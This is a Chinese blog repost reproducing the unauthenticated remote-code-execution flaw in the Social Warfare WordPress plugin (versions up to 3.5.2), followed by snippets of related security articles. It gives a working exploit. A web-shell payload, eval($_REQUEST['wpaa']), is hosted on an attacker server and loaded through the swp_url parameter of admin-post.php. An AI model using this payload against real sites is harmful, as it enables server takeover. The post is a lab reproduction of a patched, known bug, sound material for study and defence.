WordPress插件Social Warfare<=3.5.2 无需登录RCE漏洞

最新推荐文章于 2024-04-17 11:31:22 发布
最新推荐文章于 2024-04-17 11:31:22 发布
阅读量619 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/dgjnszf/p/10793638.html
版权

  该漏洞只存在于Social Warfare插进的3.5.03.5.13.5.2版本中,其他版本不存在。

  2019年3月21日插件作者紧急发布了3.5.3版本以修复高危的RCE漏洞,在<=3.5.2版本中存在一处无需登录即可getshell的RCE漏洞。

漏洞分析

在/wp-content/plugins/social-warfare/lib/utilities/SWP_Database_Migration.php文件中有一处eval()函数,该函数将file_get_contents()读取的文件内容当做PHP代码执行导致RCE。

漏洞利用

第一步:刺探是否安装了Social Warfare插件

访问http://127.0.0.1/wp-content/plugins/social-warfare/readme.txt,如果存在readme.txt文件则说明已经安装该插件,并且从该txt文件中可获知插件的版本。

我的本机环境为3.5.2版本。

第二步:在自己的VPS服务器上放置一个code.txt文件,并启动HTTP服务使该文件可通过HTTP访问。文件内容如下:

<pre>eval($_REQUEST['wpaa'])</pre>

 第三步:在未登陆任何账号的情况下直接访问如下链接即可getshell。

http://127.0.0.1//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://your_ip/code.txt&wpaa=phpinfo();

 

转载于:https://www.cnblogs.com/dgjnszf/p/10793638.html

weixin_30672019
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
复现WordPress xmlrpc.php漏洞和SSRF
记录并分享学习安全的知识点..
04-02 1897
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 SSRF(服务器端请求伪造) SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为 它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定UR...
常见的cms以及对应cms的历史漏洞
weixin_58155715的博客
11-28 672
OpenCart:OpenCart 是一款免费的电商 CMS,也曾出现过多个漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal:Drupal 是一款强大的 CMS,但也曾经出现过多个漏洞,包括 SQL 注入、跨站脚本、文件包含等。WordPress:这是最流行的 CMS,曾出现过许多漏洞,包括 SQL 注入、XSS、CSRF、权限提升等。Joomla:这款 CMS 曾经出现过一些严重的漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal 7.24 版本中的 SQL 注入漏洞
WordPress social-warfare插件XSS和RCE漏洞【CVE-2019-9978】
最新发布
XZ_______的博客
04-17 581
在一个宁静的小镇上,小牛是一位资深的网络安全专家。他深知,网络安全不仅仅是防止黑客攻击,更重要的是提前进行信息收集和分析,以便更好地了解潜在的威胁。有一天,李明接到了一家大型企业的邀请,希望他能协助进行一次全面的网络安全评估。李明欣然接受了这个挑战,并立即开始了准备工作。他首先通过搜索引擎和社交媒体平台,搜集了关于这家企业的各种信息。他仔细阅读了公司的官方网站、新闻报道、员工评论等,以了解企业的业务规模、组织架构、技术架构以及可能存在的安全漏洞
WordPress 3.5.1远程代码执行漏洞
weixin_30755393的博客
12-13 311
漏洞版本: WordPress 3.5.1 漏洞描述: WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL 数据库的服务器上架设自己的网志。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 WordPress插件Lightbox Plus ColorBox中simple html dom类存在程序逻辑错误,攻击者可通...
WordPress social-warfare插件XSS和RCE漏洞
lonmar的博客
07-19 1050
WordPress social-warfare插件XSS和RCE漏洞 漏洞编号 : CVE-2019-9978 影响版本 : WordPress social-warfare < 3.5.3 漏洞描述 : WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。social-warfare plugin是使用在其中的一个社交平台分享插件,其3.5.3之前版本存在跨站脚本攻击(XSS)和远程代码执行(RCE漏洞。远程攻击者可借助这些漏洞
WordPress Social Warfare插件XSS和RCE漏洞分析(CVE-2019-9978)
systemino的博客
04-25 2238
一、概述 3月21日,研究人员披露了Social Warfare中存在的两个漏洞,这是WordPress中一个非常受欢迎的插件,可以将社交网络分享按钮添加到网站或博客中。其中,一个是存储型跨站脚本攻击(XSS)漏洞,另一个是远程代码执行(RCE漏洞,这两个漏洞共同获得CVE-2019-9978编号。在3.5.3版本之前所有版本的Social Warfare中都存在这两个漏洞。3月21日,发布了...
WordPress Social Warfare组件 远程代码漏洞执行详细复现
weixin_30951231的博客
04-06 210
0x00前言 今天在知道创宇上发现3月26日提交WordPress XSS和远程代码执行漏洞,于是试着复现了下远程代码执行漏洞漏洞源于Social Warfare组件,并且版本<=3.5.2、且要是管理员登录状态,因此该漏洞是个后台代码执行 漏洞报告https://www.webarxsecurity.com/social-warfare-vulnerability/ 利用需一台...
WordPress插件】2022年最新版完整功能demo+插件v2.2.0.zip
04-09
Social Warfare – AffiliateWP 社会战争 - Affiliatewp" ---------- 泰森云每天更新发布最新WordPress主题、HTML主题、WordPress插件、shopify主题、opencart主题、PHP项目源码、安卓项目源码、ios项目源码,更有...
Splitgate: Arena Warfare New Tab-crx插件
04-06
在每个新选项卡上均包括竞技场射击游戏Splitgate:Arena Warfare的高清图像。 对于门户网站的粉丝! 在每个新选项卡上均包括竞技场射击游戏Splitgate:Arena Warfare的高清图像。 对于门户网站的粉丝! 请给我们评分...
Plants Vs. Zombies Garden Warfare 2-crx插件
04-05
植物与 Zombies Garden Warfare 2新的选项卡扩展为您的Chrome浏览器带来了新的外观。 安装工厂与 Zombies Garden Warfare 2并享受植物的手提光HD图像与 僵尸花园战2。 它配备了一些很酷的属性,可以改善您的新标签...
Blocky Gun 3D Warfare Multiplayer-crx插件
04-06
语言:English,slovenščina 这次,您可以加入雇佣军或德国人。 我把它留给了你,哪一方对你更有吸引力。 无论如何,你得到 ,你可以加入雇佣军或德国人。 我把它留给了你,哪一方对你更有吸引力。...
Wordpress漏洞复现
weixin_52194536的博客
09-10 8922
cms漏洞
Wordpress漏洞利用&WPscan使用
Love&Share
11-17 8969
WordPress是一个开源的内容管理系统(CMS),在全球范围内使用比较广泛,但遇到一个WP站点时可以首先用WPscan进行扫描收集信息 WPscan WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞插件漏洞WordPress本身的漏洞,在遇到wp站点时可以扫描一下 1、刺探基础信息: wpscan --url http://www.example.com 2、猜解后台用户名 wpscan --url.
WordPress xmlrpc.php SSRF漏洞
maverickpig的博客
07-08 1278
网络安全自学日志-漏洞复现篇:WordPress xmlrpc.php SSRF漏洞 本文参考https://blog.csdn.net/god_zzZ/article/details/109991484,为本人复现笔记,如有侵权可联系我删除 该漏洞工作中遇到过 一、漏洞详情 1.1 WordPress xmlrpc.php 存在SSRF漏洞 利用WordPress的xmp-rpc接口,通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程
wordpress 注入恶意代码漏洞利用与修复方案
网站安全资讯
09-16 1023
撸了今年阿里、头条和美团的面试,我有一个重要发现.......>>> ...
记一次菜鸡的低级折腾--WordPress get Webshell(后台文件编辑插马)
weixin_30908941的博客
03-13 1059
挺简单的一个测试站,开始思路错了,一直去网上找WordPress漏洞,看有没有什么能利用的,未果,因为这个测试站有些地方并不完善,有的漏洞利用不了,菜鸡的我连弱口令都没猜对,没知识就是这么悲哀。 下面记录一下全过程。。。。 1、wpscan扫描(毫无卵用的步骤) 扫描到主题:twentyseventeen 但是并没有插件: 扫描一下主...
WORDPRESS后台拿SHELL的方法
cnbird's blog
12-17 5165
WORDPRESS后台拿SHELL的方法
Wordpress 4.6 任意命令执行漏洞
玄道的网安博客
06-12 4843
1、简介 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 2、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 3、环境搭建 我们这里使用vulhub和docker搭建环境 cd vulhub/wordpress/pwnscriptum docker-compose build docke
wordpress账号无法登陆_完美解决方案:wordpress后台进不去,用户名、密码输入了登陆没有反应...
weixin_30456235的博客
01-30 1278
标签:http://mingming4745.blog.163.com/blog/static/173845720119159425890/?suggestedreading————————————————————————————————————————————————————————————————————————————————亲自试过,解决了自己网站的问题,因此转过来与饱受困惑的战友们分享。...
lectronic warfare and radar systems engineering handbook. 4th edition.
06-21
“Electronic Warfare and Radar Systems Engineering Handbook. 4th edition” 是一本工程手册,主要介绍了电子战和雷达系统工程方面的知识和技术。这本手册包括了广泛的主题,涵盖了从设计和开发到部署和维护的全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值